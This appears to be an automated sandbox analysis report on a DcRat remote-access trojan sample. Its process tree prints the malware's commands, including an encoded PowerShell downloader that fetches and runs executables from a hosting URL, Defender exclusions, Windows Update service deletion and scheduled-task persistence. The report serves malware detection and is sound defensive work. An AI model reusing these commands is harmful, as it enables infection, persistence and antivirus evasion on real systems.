Analysis

  • max time kernel
    136s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-07-2024 19:24

General

  • Target

    Speedy.exe

  • Size

    160KB

  • MD5

    7b9610cdb99b9973810e3e25e2548ba9

  • SHA1

    776ecee620560f31d35fbd9894737e7b4133d29a

  • SHA256

    1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096

  • SHA512

    29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660

  • SSDEEP

    3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies security service 2 TTPs 5 IoCs
  • Process spawned unexpected child process 39 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in Program Files directory 27 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Speedy.exe
    "C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2556
      • C:\Users\Admin\AppData\Local\Temp\ft.exe
        "C:\Users\Admin\AppData\Local\Temp\ft.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:4876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5092
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:2028
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1620
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:4288
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1708
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:3124
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            5⤵
              PID:1540
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
              5⤵
                PID:452
              • C:\Windows\system32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                5⤵
                • Modifies security service
                PID:4060
              • C:\Windows\system32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                5⤵
                  PID:1628
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  5⤵
                    PID:3824
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                  4⤵
                  • Power Settings
                  • Suspicious use of WriteProcessMemory
                  PID:1256
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -hibernate-timeout-ac 0
                    5⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4980
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -hibernate-timeout-dc 0
                    5⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3220
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -standby-timeout-ac 0
                    5⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4260
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -standby-timeout-dc 0
                    5⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2720
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell <#velngcggt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4304
              • C:\Users\Admin\AppData\Local\Temp\Tor.exe
                "C:\Users\Admin\AppData\Local\Temp\Tor.exe"
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1252
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\KNpp6xs8D.vbe"
                  4⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4108
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\unV39Cxd.bat" "
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1028
                    • C:\DriverHostCrtNet\comSvc.exe
                      "C:\DriverHostCrtNet\comSvc.exe"
                      6⤵
                      • Drops file in Drivers directory
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4404
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2472
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:3452
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2820
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:3940
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2816
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:1948
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:3140
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:3364
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:4364
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2784
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:4616
                      • C:\DriverHostCrtNet\System.exe
                        "C:\DriverHostCrtNet\System.exe"
                        7⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        PID:3320
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs"
                          8⤵
                            PID:1464
                            • C:\DriverHostCrtNet\System.exe
                              C:\DriverHostCrtNet\System.exe
                              9⤵
                              • Executes dropped EXE
                              PID:5280
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs"
                            8⤵
                              PID:2292
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:5036
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:1084
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:648
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3180
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3060
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4516
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:552
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3384
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3228
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:752
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:1836
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4092
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3980
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:1008
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:2556
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4268
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:1544
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4108
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\System.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4372
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4484
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4364
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:464
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4616
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4688
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3080
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:448
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4164
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:2896
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3580
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4316
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4628
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:2192
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4228
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4824
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:2780
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:3412
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:5036
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:4552
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Scheduled Task/Job: Scheduled Task
                PID:1084

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\DriverHostCrtNet\KNpp6xs8D.vbe

                Filesize

                201B

                MD5

                a9feb4bb422aae9305d1c9d7c223dce5

                SHA1

                a4e983d8f1b7b21b9edc1fbbe358ea67dc38cf37

                SHA256

                22851b07f5b85a7cd0992b1593b973b9e29af03733dd0a86284f0c759bbc2201

                SHA512

                da6a69df2fc09304c97979b51027971636328f01bd69dcab955395acf64e1f0c6c9a6aa9fe77d4d53f7fd16146acd332650f3d00cfd8664b6304ef719cbe4255

              • C:\DriverHostCrtNet\System.exe

                Filesize

                1.7MB

                MD5

